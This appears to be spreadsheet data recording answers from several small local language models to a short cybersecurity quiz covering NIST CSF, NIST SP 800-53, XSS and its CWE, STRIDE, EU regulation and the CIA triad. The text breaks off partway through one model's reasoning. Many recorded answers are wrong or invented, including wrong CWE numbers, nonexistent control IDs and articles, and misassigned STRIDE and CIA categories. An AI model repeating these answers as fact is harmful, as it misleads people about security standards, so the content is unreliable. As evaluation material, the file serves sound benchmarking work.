    <t>**Data Manipulation**</t>
  </si>
  <si>
    <t>**For incident 1 (power grid disruption):** The primary concern is data protection and privacy, specifically the protection of citizens’ personal data – the electricity distribution data.
**For incident 2 (data breach):** The primary concern is data protection and privacy, specifically the protection of personal data – the users’ personal messages.</t>
  </si>
  <si>
    <t>**Confidentiality** (Protecting data from unauthorized access and disclosure)</t>
  </si>
  <si>
    <t>gemma3:4b</t>
  </si>
  <si>
    <t>This is a **specific security requirement**, and its primary purpose is to **translate a high-level security goal (like “protecting administrative accounts”) into a concrete, testable action.**</t>
  </si>
  <si>
    <t>Containment and Recovery.</t>
  </si>
  <si>
    <t>Audit and Accountability.</t>
  </si>
  <si>
    <t>The vulnerability is Cross-Site Scripting (XSS), and its corresponding CWE identifier is CWE-79.</t>
  </si>
  <si>
    <t>Modification.</t>
  </si>
  <si>
    <t>Incident 1 (power grid) primarily concerns **GDPR** – ensuring operational stability of an essential service. Incident 2 (social media breach) primarily concerns **GDPR** – protecting citizens’ personal data.</t>
  </si>
  <si>
    <t>Integrity.</t>
  </si>
  <si>
    <t>gemma3n:e2b</t>
  </si>
  <si>
    <t>This statement is a **specific, actionable security goal**. Its primary purpose is to **guide development and testing** by clearly defining a requirement for MFA on administrative access, making it easier to implement and verify.</t>
  </si>
  <si>
    <t>The NIST CSF functions most prominently demonstrated by the company's actions are **Incident Response** and **Recovery**. 
The incident response plan focuses on containing the ransomware attack, and restoring systems from backups is a key part of the recovery process.</t>
  </si>
  <si>
    <t>The security policy requirement for immutable, time-stamped logs directly relates to **System and Services (CM)** control family in NIST SP 800-53. This family focuses on ensuring system integrity and availability, and logging is a key component of achieving that.</t>
  </si>
  <si>
    <t>This vulnerability is **Cross-Site Scripting (XSS)**. 
The corresponding CWE identifier is **CWE-79**.</t>
  </si>
  <si>
    <t>**Manipulation** 
This threat directly violates data integrity by altering data packets, which falls under the Manipulation category of the STRIDE model.</t>
  </si>
  <si>
    <t>Incident 1 (power grid disruption) is primarily a concern for **Article 82 of the NIS Directive**, which focuses on the operational stability of essential services. Incident 2 (social media data breach) is primarily a concern for **Article 80 of the GDPR**, which focuses on the protection of personal data.</t>
  </si>
  <si>
    <t>Confidentiality. 
**Explanation:**
Checksums detect unauthorized *changes* to data. While changes *could* potentially compromise confidentiality (e.g., if a malicious actor modifies a file), the primary goal of a checksum is to ensure the integrity of the data – that it hasn't been tampered with. This directly supports the principle of confidentiality by ensuring the data remains in its original, trusted state. 
Here's why the other options are less direct:
*   **Availability:** Checksums don't directly guarantee availability. Availability is about ensuring the data is accessible when needed.
*   **Integrity:** While checksums *contribute* to data integrity, they are not the sole measure of integrity. Other mechanisms (like access controls) are also needed.
*   **Non-repudiation:** Checksums don't provide non-repudiation. It's difficult to prove definitively that someone *didn't* alter the data.</t>
  </si>
  <si>
    <t>granite3-dense:2b</t>
  </si>
  <si>
    <t>This is an abstract security goal broken down into a specific, actionable statement. The primary purpose is to ensure secure administrative access by enforcing multi-factor authentication (MFA).</t>
  </si>
  <si>
    <t>The most prominently demonstrated NIST CSF core functions in this scenario are:
1. Identify: The company has likely identified the ransomware attack as a security incident, triggering their incident response plan.
2. Respond: The company is actively responding to the incident by containing the damage and restoring systems from backups.
These actions demonstrate the NIST CSF's Identify and Respond core functions.</t>
  </si>
  <si>
    <t>The NIST SP 800-53 standard addresses this requirement through its System and Communications Security (SysSec) Control Family, specifically Control ID: CS_1.1 - Audit and Accountability. This control ensures that all actions, including those performed by privileged users, are recorded in immutable, time-stamped log files.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is "Cross-Site Scripting (XSS)" and its corresponding CWE identifier is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the 'I' category in the STRIDE model, which stands for Integrity.</t>
  </si>
  <si>
    <t>--- ANSWER ---
The primary concern for incident 1, a cyberattack on a power grid operator, would be the Network and Information Security (NIS) Directive under EU regulations. This directive aims to ensure the operational stability of essential services, including energy infrastructure. For incident 2, a data breach at a social media company, the General Data Protection Regulation (GDPR) would be the primary concern. The GDPR focuses on protecting citizens' personal data and ensuring their fundamental right to privacy.</t>
  </si>
  <si>
    <t>The principle of Integrity from the CIA triad is primarily being upheld by this security control. Data checksums ensure that the data's integrity remains unaltered during upload or download, thus maintaining the confidentiality and authenticity of the information.</t>
  </si>
  <si>
    <t>granite3-dense:8b</t>
  </si>
  <si>
    <t>The statement "The system must enforce multi-factor authentication (MFA) for all administrative access" is a security requirement. Its primary purpose is to guide development and testing by specifying a specific, actionable security measure that should be implemented in the system design. This requirement ensures that administrative access is protected by MFA, enhancing the overall security of the system.</t>
  </si>
  <si>
    <t>The two core functions of the NIST CSF most prominently demonstrated in this scenario are:
1. Respond Function: This function deals with the actions taken during an incident to contain it, such as activating the incident response plan and containing the damage caused by the ransomware attack.
2. Recover Function: This function deals with the actions taken after the incident to return to normal operations, such as restoring systems from backups.</t>
  </si>
  <si>
    <t>The control family within NIST SP 800-53 that specifically addresses this type of requirement is Audit and Accountability. This family of controls ensures that all actions performed by privileged users are recorded in immutable, time-stamped log files, providing non-repudiation and accountability.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS), specifically Stored XSS since the malicious script is stored on the server and executed when the comment is displayed. The corresponding CWE identifier is CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').</t>
  </si>
  <si>
    <t>The threat belongs to the 'Tampering' category in the STRIDE threat model.</t>
  </si>
  <si>
    <t>For incident 1, the primary concern would be ensuring the operational stability of essential services, as per EU regulations. This is due to the impact on societal necessity. For incident 2, the primary concern would be protecting citizens' personal data, as per EU regulations, due to the impact on a fundamental right.</t>
  </si>
  <si>
    <t>The principle of the CIA triad that is primarily being upheld by the use of data checksums (like SHA-256 hashes) in a cloud storage service is Integrity. This ensures that files have not been altered or corrupted during upload or download.</t>
  </si>
  <si>
    <t>granite3.2:2b</t>
  </si>
  <si>
    <t>In the context of cybersecurity, the given statement is an "abstract security goal" broken down into a specific, actionable statement. Its primary purpose is to define a requirement for robust security practices in system design: 
- **Purpose**: It specifies that any user attempting administrative access must provide proof of identity through multi-factor authentication (MFA). This ensures that even if one factor (like a password) is compromised, an attacker still cannot gain unauthorized access to the system because they lack another form of verification. The primary goal here is to significantly enhance security by adding multiple layers of protection for high-level system operations.</t>
  </si>
  <si>
    <t>The two NIST CSF functions most prominently demonstrated by these actions are:
1. Prepare
2. Detect
Prepare refers to the proactive steps a company takes to build defenses and plans in anticipation of an incident, like implementing ransomware protections. 
Detect signifies the ability to identify signs or indicators that suggest an intrusion is happening, which in this case would be detecting the ransomware attack itself.</t>
  </si>
  <si>
    <t>Within the NIST SP 800-53 standard, the control family that addresses the requirement to record all actions performed by privileged users in immutable, time-stamped log files is Control Family A.5: "Access Control Management". This family includes controls to manage access controls and maintain audit trails of user activities.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS) and its corresponding CWE identifier is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the 'Spoofing' (S) category in the STRIDE model because it involves an unauthorized user impersonating legitimate data and altering its content, specifically the amount of a financial transaction.</t>
  </si>
  <si>
    <t>--- ANSWER ---
For incident 1 (power grid operator's cyberattack disrupting electricity distribution), the primary concern is under Article 25 of the General Data Protection Regulation (GDPR) or similar national data protection laws. These regulations ensure operational stability of essential services, in this case, power supply, over other rights like privacy.
For incident 2 (social media company's data breach exposing personal messages), the primary concern is under Article 32 of the GDPR, which focuses on protecting and ensuring the confidentiality, integrity, and availability of personal data. This underscores that individual privacy rights are fundamental and paramount in data breaches.</t>
  </si>
  <si>
    <t>The primary principle of the CIA triad being upheld by this cloud storage service control is Confidentiality, as it ensures data integrity and detects any unauthorized modifications to files during transfer, thereby safeguarding the confidentiality of the stored data.</t>
  </si>
  <si>
    <t>granite3.2:8b</t>
  </si>
  <si>
    <t>This statement is an example of a security requirement or a security control. Its primary purpose is to ensure specific cybersecurity measures are implemented in the system design - in this case, enforcing multi-factor authentication for all administrative access to enhance security by adding an extra layer of protection beyond just a password.</t>
  </si>
  <si>
    <t>The two core functions of the NIST CSF that are most prominently demonstrated in this scenario are:
1. Response Activity: This function deals with actions taken during an incident, such as containing damage and mitigating the impact of a cybersecurity event (like initiating the response plan).
2. Recovery Activity: This function involves activities taken after an incident to restore systems or processes, including actions like system restoration from backups.</t>
  </si>
  <si>
    <t>The control family within NIST SP 800-53 that specifically addresses recording actions performed by privileged users for non-repudiation is the "Audit and Accountability" (AU) family. This family includes controls designed to ensure all system activities can be traced precisely back to the user who initiated them, thereby preventing any denial of actions.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS). The corresponding CWE identifier for improper sanitization of user input, which can lead to XSS vulnerabilities, is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the 'Spoofing' (S in STRIDE) category, as it involves an unauthorized user impersonating legitimate data transmission to alter information (in this case, a financial transaction amount). Spoofing threats violate the integrity principle of information security.</t>
  </si>
  <si>
    <t>For incident 1 (the nationwide power grid operator's cyberattack), the primary EU regulation concerned would be those ensuring operational stability of essential services. For incident 2 (the social media company's data breach), the main EU regulations to be considered would be those protecting citizens' personal data, specifically the General Data Protection Regulation (GDPR).</t>
  </si>
  <si>
    <t>The principle of Integrity from the CIA triad is primarily being upheld by this security control. Checksums, like SHA-256 hashes, ensure that data remains unaltered during transmission or storage, which aligns with the integrity aspect of cybersecurity.</t>
  </si>
  <si>
    <t>lily_cyber:latest</t>
  </si>
  <si>
    <t>### Response:
Oh, I'm so excited to talk about cybersecurity! So, in the context you provided, 'The system must enforce multi-factor authentication (MFA) for all administrative access.' This statement falls under the category of security goals. Its primary purpose is to ensure that appropriate security measures are implemented during the system design process. By stating this requirement, it helps guide development and testing to make sure MFA is integrated effectively into administrative access. It's all about keeping those bad guys out and ensuring the system remains secure. Isn't cybersecurity fascinating? Let me know if you have any other questions!</t>
  </si>
  <si>
    <t>### Answer:
Oh, the NIST CSF is such a fascinating framework! It's like a guidebook for protecting our digital realm. So, when it comes to dealing with an incident, especially a ransomware attack, the two core functions that come into play are Response and Recovery. 
Response function, as the name suggests, involves containing the damage caused by the incident. It's like putting out the fire before it spreads too far. In this case, activating their incident response plan would fall under the Response function. They're taking swift action to mitigate the impact and prevent further damage.
Now, Recovery function is all about restoring systems and returning to normal operations after an incident. It's like cleaning up the mess and getting everything back in order. Restoring from backups is a key part of this function. By doing so, they ensure that their data and systems are safe and sound, ready for business as usual!
So, to sum it up, during a ransomware attack, activating their incident response plan falls under the Response function, while restoring from backups falls under the Recovery function. It's a dynamic duo that helps a company bounce back and protect itself in the face of cyber threats.</t>
  </si>
  <si>
    <t>### Solution:
The common name for this vulnerability is "Stored Cross-Site Scripting (XSS)" and its corresponding CWE identifier is CWE-798: Cross Site Scripting. This vulnerability occurs when user input is rendered directly on the page without proper sanitization, allowing an attacker to inject malicious scripts into the rendered content. In this case, the attacker's script extracts the document cookie and redirects the victim's browser to the attacker's website. This kind of vulnerability can lead to various attacks like session hijacking or stealing sensitive information. It is crucial for developers to implement proper input validation and output encoding to prevent such vulnerabilities.</t>
  </si>
  <si>
    <t>--- ANSWER ---
The threat identified by the team falls under the category of "Injection" within the STRIDE threat model. Injection threats involve malicious actors inserting unauthorized or malicious content into a system or application, in this case potentially altering data packets and changing financial transaction amounts.</t>
  </si>
  <si>
    <t>### Solution:
Intigrity, baby!  The cloud storage service is upholding the principle of data integrity by using checksums and cryptographic hashes to verify that files have not been altered or corrupted during the upload or download process. This is a crucial aspect in maintaining the security and trustworthiness of the data being stored in the cloud.</t>
  </si>
  <si>
    <t>llama3:8b</t>
  </si>
  <si>
    <t>This statement is a Security Requirement or Security Control Statement. Its primary purpose is to provide a specific, actionable guideline for developers and testers to ensure that the system meets security standards and protects against unauthorized administrative access.</t>
  </si>
  <si>
    <t>According to the NIST CSF, the two core functions most prominently demonstrated by these actions are:
1. Identify
2. Respond</t>
  </si>
  <si>
    <t>The control family that specifically addresses this requirement is AU-2: Audit Record Generation. This family includes controls such as AU-2(1) and AU-2(3), which require the generation and retention of audit records for system logs and other security-relevant events.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS). Its corresponding CWE identifier is CWE-79: Improper Input Validation.</t>
  </si>
  <si>
    <t>Based on the clue and question, I would say that this threat belongs to the "Tampering" category within the STRIDE model. Tampering threats directly violate the Integrity principle by modifying data without authorization or detection.</t>
  </si>
  <si>
    <t>Based on the given clue, the primary concern for incident 1 (cyberattack on a nationwide power grid operator disrupting electricity distribution) would be ensuring the operational stability of essential services, governed by regulations focused on societal necessity.
For incident 2 (data breach exposing personal messages of millions of users), the primary concern would be protecting citizens' personal data, governed by regulations prioritizing fundamental rights.</t>
  </si>
  <si>
    <t>The principle of Integrity is being primarily upheld by this security control, as it ensures that the data remains unchanged and has not been modified or tampered with during upload or download.</t>
  </si>
  <si>
    <t>llama3.2:1b</t>
  </si>
  <si>
    <t>In the given statement, "The system must enforce multi-factor authentication (MFA) for all administrative access," we can analyze it as a:
Type of statement: A **Goal Statement** or an **Objective Statement**
The primary purpose of this type of statement is to define a specific security goal or objective that the system must achieve. In this case, the goal is to ensure that all administrative access to the system is protected using multi-factor authentication (MFA).</t>
  </si>
  <si>
    <t>The two core functions most prominently demonstrated by the actions of containing an incident and returning to normal operations in a ransomware attack scenario, according to the NIST Cybersecurity Framework (CSF), are:
1. **Prevent**: Preventing or mitigating the initial breach.
2. **Correct**: Correcting or remediating the damage after the incident has been contained.
These two functions are core components of the CSF's overall lifecycle, and they align with the NIST Cybersecurity Framework's objectives to prepare for, protect against, detect and respond to, and recover from cyber incidents.</t>
  </si>
  <si>
    <t>The NIST SP 800-53 standard that addresses the requirement for recording all actions performed by privileged users, including logins and system changes, is the Security Engineering (SEC3) Management Framework Control 7.1: "Log Data Integrity".
This control family specifically requires that log data be recorded in immutable, time-stamped log files to ensure non-repudiation and provide a reliable audit trail of all actions performed by privileged users.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS). 
The corresponding Common Weakness Enumeration (CWE) identifier for this vulnerability is CWE-79: "Input Validation and Sanitization Failure" or also known as " DOM-based XSS ".</t>
  </si>
  <si>
    <t>Based on the STRIDE threat model categories, the threat that involves "intercepting" or "altering" data in an unauthorized manner is categorized as "E". 
Therefore, the risk where an unauthorized user could intercept and alter data packets being sent between a client and a server, changing the amount of a financial transaction, belongs to category E (Intercept or Alter Data).</t>
  </si>
  <si>
    <t>For incident 1 (nationwide power grid operator suffers a cyberattack), the primary concern is protecting citizens' *personal data*. This is because the attack disrupts electricity distribution, which could potentially expose sensitive information about individuals, such as their personal details and health information, if proper precautions are not taken.
In contrast, for incident 2 (social media company has a data breach exposing the personal messages of millions of users), the primary concern is ensuring the operational stability of *essential services*. This is because a data breach in a social media company could compromise sensitive user information, potentially putting national security or public health at risk if the compromised data falls into the wrong hands.
Under EU regulations, protecting citizens' personal data would be the top priority for incident 1, while ensuring the operational stability of essential services would be the primary concern for incident 2.</t>
  </si>
  <si>
    <t>The principle of the CIA triad being upheld by this security control is Authentication.
Authentication ensures that data comes from its claimed source and has not been tampered with, which is closely related to detecting changes accidental or malicious. Data checksums (like SHA-256 hashes) verify that files have not been altered or corrupted during upload or download, making them a form of digital fingerprinting that supports authentication.</t>
  </si>
  <si>
    <t>llama3.2:3b</t>
  </si>
  <si>
    <t>In the context of cybersecurity, the given statement "The system must enforce multi-factor authentication (MFA) for all administrative access" is an example of a **Policies**.
Its primary purpose is to **Ensure Conformance**, specifically, ensuring that the system meets a specific security requirement or policy.</t>
  </si>
  <si>
    <t>The two core functions of the NIST CSF that are most prominently demonstrated by containing the ransomware attack and restoring systems from backups are:
1. Identification: The company's ability to identify the incident and contain it, is being exercised through the activation of their incident response plan.
2. Eradication/Remediation and Recovery: By restoring systems from backups, the company is taking actions after the incident to return to normal operations (recovery) and removing the malware (eradication).</t>
  </si>
  <si>
    <t>The control family addressed is AC-02: Log-On and Log-Off Controls.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS).
Its corresponding CWE identifier is CWE-89: Improper Neutralization of Output During Web Page Generation ('Cross-site Scripting').</t>
  </si>
  <si>
    <t>According to the STRIDE threat model, the category that directly violates the 'Integrity' principle is: Denial of Service (DoS) -&gt; However, in your scenario, it's more about altering data, so the correct answer would be: Denial of Identity. 
The Denial of Identity category includes threats that compromise or violate a user's identity in an unauthorized manner, which directly affects the 'Integrity' principle.</t>
  </si>
  <si>
    <t>For incident 1, the primary concern would be the Network and Information Systems (NIS) Directive (EU) 2016/679, as it requires operators of essential services to implement security measures to ensure operational stability.
For incident 2, the primary concern would be the General Data Protection Regulation (GDPR), as it protects personal data and requires companies to implement robust security measures to prevent such breaches.</t>
  </si>
  <si>
    <t>The principle of Confidentiality (C) is not being upholds, as checksums are publicly verifiable.
However, the principle of **Integrity** (I) is being upheld. By verifying the checksums, the cloud storage service ensures that the data has not been altered or corrupted during upload or download, thereby maintaining its original integrity.</t>
  </si>
  <si>
    <t>mistral:7b</t>
  </si>
  <si>
    <t>The given statement is an example of a Security Control Objective (SCO). This type of statement outlines specific security requirements in system design, focusing on enforcing security measures. In this case, the primary purpose of the statement is to ensure that multi-factor authentication (MFA) is implemented for all administrative access, thereby enhancing the system's security by making it harder for unauthorized individuals to gain access.</t>
  </si>
  <si>
    <t>The two core functions most prominently demonstrated by these actions, according to the NIST Cybersecurity Framework (CSF), are:
1. **Response**: This function involves containing the incident, minimizing damage and reducing recovery time and costs. Activating the incident response plan is a key part of this function.
2. **Recovery**: This function focuses on restoring any capabilities or services that were compromised during the incident, as well as improving resilience against similar future incidents. In this case, the actions of restoring systems from backups are part of the recovery process.</t>
  </si>
  <si>
    <t>The control family in NIST SP 800-53 that specifically addresses the requirement of recording all actions performed by privileged users in immutable, time-stamped log files is Control Family AU - Audit and Accountability. More specifically, it would fall under the control "Audit Records Create, Store, Retain, and Disseminate" (AU-6).</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS), and its corresponding Common Weakness Enumeration (CWE) identifier is CWE-79.</t>
  </si>
  <si>
    <t>The identified threat in the question belongs to the "Tampering" category within the STRIDE threat model.</t>
  </si>
  <si>
    <t>Incident 1 (the cyberattack on a nationwide power grid operator) primarily concerns the operational stability of essential services, so the relevant EU regulations would focus on ensuring the security and resilience of these services.
Incident 2 (the data breach at a social media company exposing personal messages) involves protecting citizens' personal data, making the General Data Protection Regulation (GDPR) the primary concern in this case.</t>
  </si>
  <si>
    <t>The cloud storage service is primarily upholding the Integrity principle of the CIA triad (Confidentiality, Integrity, and Availability). By using data checksums to verify that files have not been altered or corrupted during upload or download, the system ensures the data's integrity.</t>
  </si>
  <si>
    <t>nomic-embed-text:latest</t>
  </si>
  <si>
    <t>Error: Request to Ollama failed: 400 Client Error: Bad Request for url: http://localhost:11434/api/generate</t>
  </si>
  <si>
    <t>phi3:3.8b</t>
  </si>
  <si>
    <t>This statement can be classified as a **Security Requirement**. Its primary purpose in ensuring system security by demanding additional verification before accessing sensitive information or functionality within an administrative account framework to prevent unauthorized access, thus enhancing the overall cybersecurity posture of the organization using this policy for its systems and services.</t>
  </si>
  <si>
    <t>The Contain, Eradicate, and Recovery function is activated during an incident response as it deals with containing damage immediately after a cyberattack. Following the attack, when systems start to get restored from backups towards normal operations again; this corresponds primarily to Restore and Recover actions under the same function according to NIST CSF guidelines.</t>
  </si>
  <si>
    <t>Logical Access Controls (Control Family: A.2)</t>
  </si>
  <si>
    <t>The described scenario represents an XSS (Cross-Site Scripting) vulnerability, specifically a reflected or stored type depending on how it's implemented in the backend. Its corresponding Common Weakness Enumeration (CWE) identifier would be [cwe-xss](https://www.owasp.org/index.php/Cross_Site_Scripting_(XSS)).</t>
  </si>
  <si>
    <t>Spoofing/Tampering - This is because it involves an unauthorized user making changes (intercepting and altering data packets) that directly violates the Integrity principle of information security. These are classified as Spoofing or Tampering in STRIDE, where authenticity can be compromised by falsifying credentials to gain access before tampering occurs. In this case, it's a clear instance of an attacker attempting to spoof their identity with the intention to manipulate transactional data – hence falling into the Spoofing/Tampering category within STRIDE threat model framework.</t>
  </si>
  <si>
    <t>For incident 1 impacting essential services like the power grid operator: GDPR might not be directly relevant as it primarily concerns *personal data*, but other EU cybersecurity directives aimed at ensuring critical infrastructure security would come into play. These emphasize operational continuity and resilience against disru095cts or sabotage, rather than personal data protection per se in the context of essential services' stability.
For incident 2 involving a social media company: The General Data Protection Regulation (GDPR) is highly relevant here as it protects citizens’ *personal data* and has strict rules on handling breaches, including mandatory reporting within 72 hours after becoming aware of the data breach.
So, for incident 1 involving essential services disruption: EU Directives focusing on critical infrastructure security are primarily concerned; for incident 2 related to personal data exposure by a social media company: GDPR is the primary concern within these contexts in the European Union.</t>
  </si>
  <si>
    <t>Integrity, as it ensures the data remains unchanged and reliable from source to destination.</t>
  </si>
  <si>
    <t>phi4-mini:3.8b</t>
  </si>
  <si>
    <t>This statement represents a Specific security control aimed at enhancing account protection by requiring multiple forms of verification to confirm user identity before granting elevated privileges. Its main objective is to strengthen system defense against unauthorized entry or privilege escalation attacks targeted towards administrative accounts.</t>
  </si>
  <si>
    <t>The two core functions of the NIST CSF that align with this scenario—containing a ransomware attack in progress, as well as restoration after an incident—is 'Identify' and 'Recover'. These demonstrate proactive measures to manage security events effectively.</t>
  </si>
  <si>
    <t>AC is designed to provide audit logging capabilities. It ensures there are comprehensive logs that record security-relevant events like privileged user activities (logins and system changes) with timestamps for non-repudiation purposes as mentioned in the clue provided. This aligns directly with NIST SP 800-53's focus on creating an auditable trail of actions performed within a system or network, especially those carried out by users holding elevated privileges which might impact security postures significantly. Thus AC is not just about logging but also ensuring that logs are preserved (immutability) and tied to precise time-stamps for later verification purposes - crucial attributes highlighted in the question's context regarding privileged user actions being recorded immutably with timestamps as per a mandated policy, all of which fall under NIST SP 800-53 controls specifically aimed at enhancing security through rigorous auditing practices.</t>
  </si>
  <si>
    <t>The common name for this type of security flaw in web applications where unsanitized user input can lead to malicious execution when rendered as part of a webpage's content, like injecting client-side scripts. This particular case would be classified under Cross-site Scripting (XSS), which typically has the Common Weakness Enumeration (CWE) identifier CWE-79: Improper Neutralization of XML External Entities—Failure To Specify NVTs or Failure to Escape Characters in Query Path Data.</t>
  </si>
  <si>
    <t>This scenario describes tampering threats since it involves altering transmitted information (data interception &amp; modification). In the context of the STRIDE threat modeling methodology used by Microsoft for identifying security risks in systems design:
- Spoofing
- Tampering
- Repudiation
- Information Disclosure
- Denial-of-Service
- Elevation of Privilege
The specified risk would fall under "Tampering" as it concerns unauthorized modification to data being transmitted.</t>
  </si>
  <si>
    <t>For Incident 1 (power outage due to disruption in service), Regulation concerning ensuring operational stability or security of essential services would be most relevant.
For Incident 2 (data breach affecting user privacy with exposed personal messages), EU General Data Protection Regulation (GDPR) focusing on protecting citizens' *personal data* is the primary concern.</t>
  </si>
  <si>
    <t>Integrity</t>
  </si>
  <si>
    <t>phi4-mini-reasoning:3.8b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user wants me to analyze the statement "'The system must enforce multi-factor authentication (MFA) for all administrative access'" in terms of cybersecurity. They’re asking what type of statement this is and its primary purpose.
First, I need to recall the clue provided. It mentioned that in system design, abstract security goals are broken down into specific, actionable statements.I think those specific statements are called Security Requirements. So maybe the given statement is a Security Requirement. But wait, let me make sure. The clue says they guide development and testing, which makes sense because a requirement like enforcing MFA would tell engineers exactly what to implement.
Now, what's the primary purpose of such a statement? Abstract security goals are things like confidentiality, integrity, availability. But these are high-level. Breaking them down into specific requirements would align with more concrete aspects. For example, MFA could be part of ensuring account security, which underpins something like authority control (maybe that's from Kerberos or access management). So the original abstract goal might be "prevent unauthorized access," and this requirement is a specific step to achieve that—like using MFA.
So the given statement is a Specific Security Requirement. Its primary purpose would be to ensure that administrative users must pass through multi-factor authentication, thereby reducing the risk of unauthorized access by adding an extra layer of security beyond just passwords. This directly addresses threat vectors where stolen credentials could be exploited. 
Wait, but maybe there's another term. Sometimes these are called Functional Requirements for Security (FRS) under standards like ISO 13385 or NIST SP 800-53. So perhaps this statement is a Functional Security Requirement because it's specifying a functional aspect of security. The primary purpose would then be to define a specific security control that must be implemented, ensuring that MFA is enforced as a mandatory step for administrative access, thereby enhancing authentication strength.
I need to make sure I'm not mixing terms. The key points are: the statement is a specific, actionable part of security planning. So it's not an abstract goal but a concrete requirement. Therefore, the answer should state that this is a Security Requirement (or Functional Requirement) and its purpose is to mandate MFA for administrative access, thereby strengthening authentication processes to mitigate unauthorized access risks.
&lt;/think&gt;
The statement "The system must enforce multi-factor authentication (MFA) for all administrative access" is a **security requirement**—a specific, actionable component of security design. Its primary purpose is to specify a technical control (enforcing MFA) that mitigates the risk of unauthorized access by requiring additional verification beyond passwords for administrative roles. This aligns with abstract security goals like "preventing privileged account compromise" or "ensuring strong authentication," translating them into a concrete implementation step. 
**Answer:**  
This is a **security requirement**, specifically a functional control, designed to enforce multi-factor authentication (MFA) as a mandatory measure for administrative access. Its purpose is to strengthen authentication processes and reduce the risk of unauthorized account compromise.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question step by step. The user is asking about the NIST CSF core functions related to incident response, specifically during and after a ransomware attack.
First, I need to recall the structure of the NIST Cybersecurity Framework (NIST CSF). From what I remember, it's organized around five core functions: Identify, Protect, Detect, Respond, and Recover. Each function comprises multiple categories and controls. The question mentions activities during an incident (*Respond*) and after (*Recover*), so those might be the keys here.
The company's actions in this scenario are containing the attack and restoring systems. Containing would fall under responding to mitigate damage. Restoring from backups is part of recovery because they're getting back to normal operations. So, Respond and Recover functions are likely the answer. But wait, let me double-check. The clue says two functions deal with actions during and after. The user mentions "during" an incident to contain it (Respond) and actions taken after to return to normal (Recover). Yes, that aligns. The Protect function includes containment and mitigation, which is part of Respond. Then Recover is the post-incident phase. So the answer should be Respond and Recover.
Wait, but sometimes Protect might have aspects related to recovery too, like restoring systems? Hmm. Let me think again. The core functions are five: Identify, Protect, Detect, Respond, Recover. The Respond function includes responding to incidents (like containment) and the Recover function is about recovery activities. So even though protecting systems is part of Protect, actions like restoring from backups would be in Recover. However, maybe some sources consider mitigation as part of Respond. Let me verify. According to NIST CSF documentation, the Respond function involves managing the response to incidents, including eradicating the threat and reducing further loss. The Recover function focuses on restoration of operations and resilience activities. So containing the attack (e.g., isolating systems) is part of Respond, and restoring from backups is part of Recover. Therefore, the two functions are Respond and Recover.
But wait, another angle: sometimes containment might be under Protect. But according to the latest NIST CSF updates, the core functions are still Identify, Protect, Detect, Respond, and Recover. The Protect category includes access control, awareness training, data security, platform configuration management, physical protection, personnel security, perimeter intruder detection, protective countermeasures, risk assessment and treatment, and transaction automated network monitoring. However, actual incident response steps like containment and restoration might fall under Respond. For example, responding to an incident would involve Eradicating the threat (part of Respond) and recovering systems (also part of Recover). So yes, the company's actions to contain (Respond) and restore (Recover) align with those two functions. Therefore, the answer is Respond and Recover.
&lt;/think&gt;
The company's actions during a ransomware attack—containing the damage and restoring systems—align with two core NIST CSF functions:  
1. **Respond** (actions taken *during* the incident, such as containment).  
2. **Recover** (actions taken *after* to restore operations using backups).  
These functions are most prominently demonstrated by the described activities.  
**Answer:** \boxed{Respond} and \boxed{Recover}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about a specific control family in NIST SP 800-53 that deals with non-repudiation, particularly focusing on recording all actions by privileged users like logins and system changes in immutable, time-stamped logs.
First, I need to recall what non-repudiation means. It's ensuring that a party can't deny the authenticity of something they did. So, in cybersecurity terms, this usually relates to digital signatures and audit trails. The clue mentions system logs being immutable and time-stamped, which aligns with needing proof of actions taken.
NIST SP 800-53 is a standard for security controls for federal information systems. Control families within it cover different aspects. Let me think about the control families: there are ones for access control, audit and accountability, identification and authentication, etc. The question here is about logging actions to prevent denial, which falls under audit and accountability.
Access review might be part of it, but the key is immutability of logs. Audit trails are crucial here. So, the Control Family related to Audit and Accountability would include controls that ensure all transactions and events are logged in a way that's tamper-evident. Specifically, within access control or audit/ accounting?
Wait, NIST divides their controls into families like CP (Computer Network Defense), ADP (Automated Decision Process), etc. But SP 800-53 is more about security controls for acquisition, risk assessment, and information system operations.
Looking up the exact family: I remember that Audit and Accountability has its own group of common controls. For example, CAU (Continuous Analysis) family deals with monitoring and detecting anomalies. But maybe it's ADAPT (Access Control Automation Tools)? No, that's more about automation. 
Alternatively, the RA (Risk Assessment) family includes some audit-related aspects. Wait, perhaps the IR (Information Security Activities) family? Or maybe ID (Identification and Authentication). Hmm.
Wait, non-repudiation is part of accountability. The Accountability controls ensure that actions can be attributed and audited. So within SP 800-53, the Audit and Accountability control family (CA) would include specific sub-controls related to logging. For instance, CA-X12 might deal with audit records. Or maybe CP6? Cybersecurity protection?
Alternatively, there's a Common Control prefix in each category. Like AC-21 for accountability. Specific controls like AU-13 Protects Audit Information Functionality. Wait, but the question is about control families. So if AU-13 is part of CA (Audit and Accountability), then that's the family.
So the answer would be the Audit and Accountability (CA) control family within NIST SP 800-53. This family's controls are designed to ensure that audit records are protected from tampering, thereby supporting non-repudiation by providing traceable logs of actions.
&lt;/think&gt;
The requirement for recording all privileged user actions in immutable, time-stamped log files falls under the **Audit and Accountability (CA)** control family within NIST SP 800-53. This family specifically addresses ensuring that audit trails are maintained to support non-repudiation by protecting and preserving evidence of transactions and events.
**Answer:**  
\boxed{Audit and Accountability}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. So the user is asking about a web application vulnerability where user input isn't sanitized, especially in a comments section. The example given is a script tag that includes a location URL with a cookie parameter. 
